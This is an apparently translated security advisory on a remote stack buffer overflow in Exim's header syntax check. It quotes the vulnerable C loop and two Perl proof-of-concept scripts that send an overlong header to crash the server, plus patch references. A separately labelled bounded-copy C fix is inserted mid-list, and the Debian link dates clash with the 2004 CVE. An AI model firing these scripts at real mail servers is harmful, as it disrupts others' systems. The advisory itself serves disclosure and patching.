Affected program:
Exim
Description:
Exim header syntax check remote stack buffer overflow vulnerability
Details:
Exim is a popular mail server (MTA).
When the headers_check_syntax option is set in the exim.conf configuration file, Exim does not properly check buffer bounds while checking message headers. A remote attacker can send a malicious e-mail that, when Exim processes it, triggers the buffer overflow.
In accept.c of Exim 3.35 and verify.c of Exim 4.32:
---
char hname[64];          /* fixed-size stack buffer for the header name */
char *t = h->text;       /* raw header line as received from the client */
char *tt = hname;
char *verb = "is";
int len;
while (*t != ':') *tt++ = *t++;   /* no bound check on hname: a name longer than 63 bytes overflows it */
*tt = 0;
---
If the exim.conf of Exim 3.35 contains the "headers_check_syntax" option, or that of Exim 4.32 contains "require verify = header_syntax", the length of "t" is not limited, so a buffer overflow can occur. It is not yet known whether this can be used to execute arbitrary instructions.
Affected systems:
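As an added illustration that is not taken from the advisory or from Exim's source, the C below rewrites the same copy loop with a bound on the 64-byte name buffer and a check for a missing colon; the function names and the constructed header lines (modelled on the 275-space test message) are my own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HNAME_MAX 64            /* same size as Exim's hname[64] */
enum { HNAME_OK = 0, HNAME_NO_COLON = -1, HNAME_TOO_LONG = -2 };

/* Bounded replacement for the unchecked loop quoted in the advisory:
 *     while (*t != ':') *tt++ = *t++;
 * Copies the header name (text before the first ':') into out, never
 * writes past outsz, and stops at end-of-string instead of running
 * off the end of the header text when no colon is present. */
int copy_header_name(const char *text, char *out, size_t outsz)
{
    size_t n = 0;
    while (*text != '\0' && *text != ':') {
        if (n + 1 >= outsz)        /* no room for this byte plus the NUL */
            return HNAME_TOO_LONG;
        out[n++] = *text++;
    }
    if (*text != ':')              /* header line had no colon at all */
        return HNAME_NO_COLON;
    out[n] = '\0';
    return HNAME_OK;
}

/* Checks one header line against a 64-byte name buffer, as Exim does. */
int header_name_status(const char *text)
{
    char hname[HNAME_MAX];
    return copy_header_name(text, hname, sizeof hname);
}

/* Constructs "From" + <spaces> spaces + ":vv v" (constructed input in the
 * shape of the test message) and reports how the bounded copy treats it. */
int long_header_status(size_t spaces)
{
    char line[512];
    if (spaces > sizeof line - 10) spaces = sizeof line - 10;
    memcpy(line, "From", 4);
    memset(line + 4, ' ', spaces);
    strcpy(line + 4 + spaces, ":vv v");
    return header_name_status(line);
}

int main(void)
{
    printf("From: root       -> %d\n", header_name_status("From: root"));
    printf("no colon         -> %d\n", header_name_status("Subject no colon"));
    printf("275-space name   -> %d\n", long_header_status(275));
    return 0;
}
```

A name of up to 63 bytes still fits exactly; anything longer is rejected instead of being written past hname.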
University of Cambridge Exim 4.32
University of Cambridge Exim-tls 3.35
University of Cambridge Exim 3.35
- Debian Linux 3.0
Attack method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
Georgi Guninski (guninski@guninski.com) provided the following test method:
----exi2.pl----------------------------------
#!/usr/bin/perl
# works if headers_check_syntax is in exim.conf
# written by georgi guninski
# cannot be used in vulnerability databases
print "HELO a\r\nMAIL FROM: BillGay\@localhost\r\nRCPT TO: SteveNoBall\@localhost\r\n";
print "DATA\r\n";
my $ch=getc();
print "From" . " " x 275 . ":" ."vv v \r\n";
print "asdasd\r\n";
print "\r\n";
print ".\r\n";
print "QUIT\r\n";
---------------------------------------------
----exi3.pl----------------------------------
#!/usr/bin/perl
use IO::Socket;
my $port = $ARGV[1];
my $host = $ARGV[0];
# written by georgi guninski
# cannot be used in vulnerability databases
print "Written by georgi guninski\nCannot be used in vulnerability databases or CVE\n";
my $repl;
my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die "socket";
$repl= <$socket>;
print "server replied ${repl}";
my $req = "HELO a\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";
my $fromaddr="BillGay\@soft";
my $touser="SteveNoBall\@soft";
$req = "MAIL FROM: ${fromaddr}\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";
$req = "RCPT TO: ${touser}\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";
$req = "DATA\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";
print "Attached with debugger to exim and press enter\n";
my $ccc=getc();
$req = "From" . " " x 200 . ":" ." root\r\n";
$req .= "just to let you know that you sux\r\n";
$req .= ".\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";
while(<$socket>)
{
print $_;
}
close $socket;
Solution:
Debian has released two security advisories for this (DSA-501-1 and DSA-502-1) together with the corresponding patches:
DSA-501-1: New exim packages fix buffer overflows
Link: http://www.debian.org/security/2002/dsa-501
DSA-502-1: New exim-tls packages fix buffer overflows
Link: http://www.debian.org/security/2002/dsa-502
Additional information:
BUGTRAQ ID: 10291
CVE(CAN) ID: CAN-2004-0400